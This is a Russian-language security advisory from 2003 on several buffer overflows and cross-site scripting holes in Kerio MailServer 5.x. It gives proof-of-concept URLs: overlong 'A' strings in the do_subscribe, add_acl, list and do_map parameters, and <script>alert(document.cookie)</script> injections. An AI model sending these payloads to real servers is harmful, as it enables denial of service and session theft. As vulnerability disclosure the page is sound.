Несколько переполнений буфера и межсайтовый скриптинг в Kerio MailServer

Дата публикации:
23.06.2003
Всего просмотров:
1699
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Kerio MailServer 5.x
Описание: Несколько уязвимостей обнаружено в Kerio MailServer. Удаленный авторизованный пользователь может выполнить произвольный код с SYSTEM привилегиями. Также обнаружены несколько XSS уязвимостей.

Удаленный авторизованный пользователь может представить специально сформированное имя пользователя 'showuser' к модулю 'do_subscribe', чтобы вызвать переполнение буфера и перезаписать EIP регистр. В результате удаленный пользователь может выполнить произвольный код. Пример:

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
Подобные уязвимости обнаружены в 'add_acl', 'list', и 'do_map' модулях. Пример:
http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
@localhost/INBOX&add_name=lucas

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX

http://[Server]/do_map?
action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
Также сообщается, что модули 'add_acl' и 'do_map' не фильтруют HTML код в данных, представленных пользователем. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример:
http://[server]/add_acl?folder=~conde0@localhost/INBOX&add_name=
<script>alert(document.cook ie);</script>

http://[Server]/do_map?action=new&oldalias=eso&alias=
<script>alert(document.cookie);</script>&folder=public&user=lucascavadora
Уязвимость обнаружена в Kerio MailServer 5.6.3

Для устранения уязвимости, установите обновленную версию программы (5.6.4), которую можно скачать отсюда:

http://www.kerio.com/dwn/kms5-mca-win.exe

 

Ссылки: Multiple buffer overflows and XSS in Kerio MailServer

или введите имя

CAPTCHA